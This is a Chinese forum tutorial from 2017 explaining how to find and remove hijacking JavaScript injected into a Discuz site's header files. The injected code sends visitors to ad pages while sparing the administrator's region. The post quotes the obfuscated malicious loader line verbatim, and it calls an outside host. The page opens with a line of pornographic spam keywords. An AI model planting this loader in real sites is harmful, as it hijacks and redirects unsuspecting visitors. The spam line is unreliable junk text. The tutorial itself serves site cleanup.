内射女校花一区二区三区,久久久老熟女一区二区三区,国产精品美女久久久网站,亚洲成AV人片在

Board logo

標題: [教程] discuz網(wǎng)站被掛馬,非管理員訪問自動跳轉到廣告頁面 怎么解決 [打印本頁]

作者: 向上的蔥子    時間: 2017-4-27 15:06     標題: discuz網(wǎng)站被掛馬,非管理員訪問自動跳轉到廣告頁面 怎么解決

你是否遇到過你的網(wǎng)站打開一會就自動跳轉到其他頁面,而且這個問題是你的用戶告訴你的,而你自己卻沒有遇到?
QQ截圖20170427140904.png
discuz掛馬彈出頁面

經(jīng)過蔥子我細心的對掛馬網(wǎng)站做排查,終于讓我找到了問題所在。

掛馬者是通過在discuz的頭部js文件里面添加了劫持js代碼,通過判斷訪問者的IP來實現(xiàn)不同跳轉的。

具體代碼如下:

document.write("<\163"+"cript src='http://\141"+"d.\172"+"om"+"12\63"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'><\/s"+"cript>");

可以看出,后面有個“chengdu”代碼,這段代碼的意思就是IP為成都地區(qū)的訪問者在訪問被掛馬頁面時不做跳轉。其余地區(qū)的IP訪問者則跳轉。

從這段代碼我們就可以看出掛馬者是多么的用心險惡。

他首先根據(jù)你網(wǎng)站所在地進行判斷網(wǎng)站管理員經(jīng)常使用的IP地址所在地,然后有針對性的對網(wǎng)站管理員不做跳轉劫持。

所以,這種劫持的情況下,網(wǎng)站管理者非常難以發(fā)現(xiàn)到網(wǎng)站被掛馬了。

解決辦法也比較簡單:

首先校驗下原始文件,對比下哪些js文件近期有被改動過,然后針對被改動過的js文件做以上代碼段的排除。找到以上代碼段后,刪除即可。

最后說一下,各位網(wǎng)站管理者一定要注意保管好網(wǎng)站和服務器的管理密碼,盡量設置的復雜一點。同時也要及時檢測服務器是否存在漏洞等,及時做針對性處理,以避免類似的事情再發(fā)生。

以上文章為向上的蔥子原創(chuàng),轉載請注明出處。

原文地址:http://www.aitiancheng.com/article-491.html

圖片附件: QQ截圖20170427140904.png (2017-4-27 15:06, 5.52 KB) / 下載次數(shù) 9909
http://www.sdymsy.com/bbs/attachment.php?aid=7233&k=bc8289b83c51cfb626317bc9f8e37152&t=1746164302&sid=rn1j7D






歡迎光臨 WDlinux官方論壇 (http://www.sdymsy.com/bbs/) Powered by Discuz! 7.2